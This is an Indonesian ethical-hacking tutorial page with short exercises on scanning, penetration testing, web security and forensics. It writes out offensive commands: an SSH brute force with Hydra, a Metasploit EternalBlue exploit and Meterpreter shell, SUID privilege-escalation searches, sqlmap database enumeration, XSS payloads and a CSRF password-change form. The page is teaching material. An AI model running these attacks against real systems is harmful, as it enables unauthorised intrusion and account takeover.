Skip to main content

🔐 Tutorial Hacking

Belajar ethical hacking dan keamanan siber.

🔒

Network Security

Keamanan jaringan dan teknik penetration testing.

Latihan 1: Scan jaringan dengan Nmap.

nmap -sV -sC 192.168.1.0/24

# Output: daftar host, port terbuka, dan service

Latihan 2: Deteksi kerentanan dengan Nessus.

1. Install Nessus
2. Buat scan policy baru
3. Masukkan IP target
4. Jalankan scan dan analisis hasil

Latihan 3: Analisis packet dengan Wireshark.

1. Buka Wireshark
2. Pilih interface jaringan
3. Capture packet
4. Analisis protocol dan payload

Latihan 4: Brute force SSH dengan Hydra.

hydra -l admin -P wordlist.txt ssh://192.168.1.1

Latihan 5: Deteksi intrusi dengan Snort.

snort -c /etc/snort/snort.conf -i eth0 -A console
🎯

Penetration Testing

Metodologi penetration testing dan tools.

Latihan 1: Reconnaissance dengan theHarvester.

theHarvester -d example.com -b google

Latihan 2: Scan port dan service dengan Nmap.

nmap -sS -sV -O -A 192.168.1.1

Latihan 3: Exploit dengan Metasploit.

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.1
exploit

Latihan 4: Privilege escalation di Linux.

sudo -l
find / -perm -4000 2>/dev/null
# Cari SUID binary yang bisa dieksploitasi

Latihan 5: Post-exploitation dengan Meterpreter.

meterpreter > sysinfo
meterpreter > getuid
meterpreter > shell
🌐

Web Security

Keamanan web application: SQL injection, XSS, CSRF.

Latihan 1: SQL Injection dengan sqlmap.

sqlmap -u "http://example.com/page?id=1" --dbs

Latihan 2: XSS (Cross-Site Scripting) testing.

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>

Latihan 3: CSRF (Cross-Site Request Forgery) testing.

<form action="http://example.com/change-password" method="POST">
    <input type="hidden" name="password" value="hacked">
</form>

Latihan 4: Directory scanning dengan Gobuster.

gobuster dir -u http://example.com -w wordlist.txt

Latihan 5: SSL/TLS scanning dengan SSLyze.

sslyze --regular example.com
🔍

Forensics

Digital forensics dan analisis malware.

Latihan 1: Analisis file dengan ExifTool.

exifTool suspicious.jpg

Latihan 2: Analisis network capture dengan Wireshark.

1. Buka file .pcap di Wireshark
2. Follow TCP Stream
3. Analisis protocol dan payload

Latihan 3: Analisis malware dengan VirusTotal.

1. Upload file ke virustotal.com
2. Analisis hasil scan
3. Cek behavior dan signature

Latihan 4: File recovery dengan PhotoRec.

photorec /dev/sda1

Latihan 5: Memory analysis dengan Volatility.

volatility -f memory.dmp imageinfo
volatility -f memory.dmp pslist